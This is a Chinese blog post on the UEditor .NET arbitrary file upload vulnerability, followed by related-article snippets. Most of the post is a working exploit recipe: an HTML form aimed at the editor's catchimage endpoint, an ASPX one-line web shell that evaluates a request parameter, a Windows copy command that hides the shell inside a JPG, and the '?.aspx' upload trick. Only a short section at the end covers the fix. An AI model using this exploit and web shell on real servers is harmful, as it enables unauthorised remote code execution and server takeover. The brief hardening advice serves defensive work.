UEditor 任意文件上传漏洞

已于 2022-07-08 10:26:21 修改
阅读量2.1k 收藏 1
点赞数
文章标签: 大数据
于 2022-07-08 09:28:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chennannanlucky/article/details/125671245
版权

http://***/utility/ueditor/net?action=catchimage

http://***utility/ueditor/net?action=config

1.新建html

<form action="http://***/utility/ueditor/net?action=catchimage" enctype="multipart/form-data" method="POST">

    <p>shell addr: <input type="text" name="source[]" /></p>

    <input type="submit" value="Submit" />

</form>

2.准备图片马

aspx  <% @Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>

copy 1.JPG/b + 1.aspx/a ueditor.jpg

打开1新建的html ,输入图片马路径 http://xxxx/ueditor.jpg?.aspx 

上传成功即说明有漏洞

3.修复漏洞

攻击者可以上传任意文件包括脚本执行文件,包括aspx脚本木马,asp脚本木马,还可以利用该UEditor漏洞对服务器进行攻击,执行系统命名破坏服务器

防御方案:

1.目前临时的漏洞修复是建议,把文件上传目录设置无脚本执行权限,uploadvideo、uploadimage、catchimage、uploadscrawl、uploadfile、等等目录都设置上无脚本权限。

window IIS6/IIS7取消脚本执行权限,禁止运行脚本木马 - 走看看

2.修改程序的源代码,对crawlerhandler源文件进行文件上传格式的严格过滤与判断。

chennannanlucky
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
UEditor JSP 版本配置以及文件配置方法
10-12
UEditor JSP 版本配置以及文件配置方法 UEditor 是一个功能强大且灵活的富文本编辑器,广泛应用于 Web 开发中。在 JSP 版本中,正确配置 UEditor文件功能非常重要,本文将指导您完成 UEditor JSP 版本的...
SRC | 记一次走运某校官网Getshell
weixin_63356045的博客
09-27 133
欢迎大家关注湘安无事公众号添加助手(wx:shougou1010)进技术交流群
UEditor .Net版本任意文件漏洞复现总结
weixin_50464560的博客
04-18 3165
UEditor .Net版本任意文件漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近看到一个表哥研究这个洞,就顺便拿来复现分析了一波。 一、漏洞介绍 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。 漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件。 Crawler方法对
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
heike_Ch的博客
05-22 381
ueditor漏洞主要存在于其上功能中,攻击者可以利用上漏洞将恶意脚本上到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上文件的后缀名是否在指定的白名单之内。
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 5010
ueditor漏洞主要存在于其上功能中,攻击者可以利用上漏洞将恶意脚本上到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上文件的后缀名是否在指定的白名单之内。
Ueditor编辑器任意文件漏洞
热门推荐
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件漏洞(部署环境到漏洞复现)
实战纪实 | 编辑器漏洞Ueditor-任意文件漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 5553
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6241
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
ueditor独立文件 .net示例
08-09
在.NET项目中,你需要创建一个处理ueditor请求的控制器或API接口。通常,这个接口会接收到ueditor发送的POST请求,请求中包含了待上文件的信息。服务器端需要验证请求的有效性,然后接收文件并保存到指定的...
ueditor自定义图片上
11-30
本篇文章将深入探讨如何解决ueditor图片时的跨域问题以及如何自定义图片上插件。 首先,我们要理解什么是跨域(CORS)。跨域是指一个域下的文档或脚本尝试请求另一个域下的资源时,如果两个域不相同,则...
ueditor文件完全版本.rar
01-02
【标题】"ueditor文件完全版本.rar"指的是一个压缩包,其中包含了ueditor编辑器的一个完整版本,特别强调了其文件功能的优化和修复。ueditor是一款广泛使用的富文本在线编辑器,它提供了丰富的功能,使得...
Ueditor文件demo-SpringBoot版
03-07
Ueditor文件demo-Java版 ,基于原版本修改,只需要UEditor下的js和配置,不需要导入jar包, 不再使用controller.jsp , 可以自定义图片上路径,位置 。 ...
UEditor v1.4.3.3 .net版本任意文件 漏洞复现
Boom!脑洞大爆炸的博客
07-07 6219
UEditor v1.4.3.3 .net版本任意文件 漏洞复现
开发知识点-dotnet/.Net+C#/CSharp
aming小老弟
07-01 1723
NET(读作"dot net")是由微软公司开发的一种广泛使用的软件开发平台。它提供了一个统一的编程模型,用于构建各种类型的应用程序,包括桌面应用、Web 应用、移动应用和云服务。.NET 平台包括一系列的工具、库和语言,其中最常用的编程语言包括C#、VB.NET 和 F#。这些语言可以与.NET提供的大型类库结合使用,以实现各种功能,如数据访问、GUI开发、安全性、网络通信等。
网安学习Day16-文件漏洞(下)
weixin_44770698的博客
05-11 724
解析漏洞 IIS6/7.X IIS6.0版本中,存在着目录解析漏洞文件解析漏洞。 其中的网站的目录下的*.php的文件夹下的文件会被当做php来执行,也就是说我们在上文件的时候可以上一个1.php/2.jpg的文件,那么在IIS6.0的环境下,2.jpg会被当做php来执行。 IIS6.0还对应着文件解析漏洞,如果出现“;”号,则IIS6.0会出现错误,例如1.php;2.jpg,它会将分号后面的文件当做php来执行。 IIS7.0 7.5具有文件解析漏洞 在IIS7.x的环境中,当我们开
老项目之UEditor漏洞问题
Mr.小灰狼_随笔
07-16 3597
老项目之UEditor漏洞问题 目录 1、文件漏洞 2、SSRF 漏洞 3、Upload XSS ueidtor 安全漏洞 _ UEditor SSRF 漏洞 ( JSP 版本 ) 分析与复现 1、项目所使用的 UEditor 组件存在 ssrf 漏洞 风险级别 : 低风险 风险分析 : 可通过此漏洞探测内容 ,甚至服务器权限...
ueditor php文件漏洞
06-06
UEditor的PHP版本的文件漏洞主要是由于后台没有进行严格的文件类型、大小和内容的检测,攻击者可以通过修改上文件文件名和后缀来绕过检测,上恶意文件,从而在服务器上执行任意代码。 攻击者可以通过以下方式来利用文件漏洞: 1. 修改文件名和后缀:攻击者可以将恶意文件文件名和后缀修改为常见的图片、文档或者压缩文件的后缀名,来绕过后台的文件类型检测。比如将恶意文件文件名修改为“test.jpg”,就可以上一个恶意的PHP文件,并且绕过后台的检测。 2. 绕过文件大小限制:攻击者可以通过改变文件请求中的Content-Length值,来绕过后台的文件大小限制。比如,攻击者可以使用Burp Suite等工具,修改Content-Length值,将一个超过限制大小的文件到服务器。 为了防止文件漏洞的利用,应该对上文件进行严格的文件类型、大小和内容的检测。具体措施可以包括: 1. 对上文件的后缀名进行白名单过滤,只允许上指定的文件类型。 2. 对上文件的大小进行限制,限制上文件的大小不能超过最大限制值。 3. 对上文件的内容进行检测,防止上恶意文件。 4. 对上目录进行安全设置,禁止直接访问上目录下的文件。 5. 定期清理上目录,删除不必要的文件。 总之,为了保障网站的安全性,必须加强文件的安全控制,防止恶意文件的上和执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值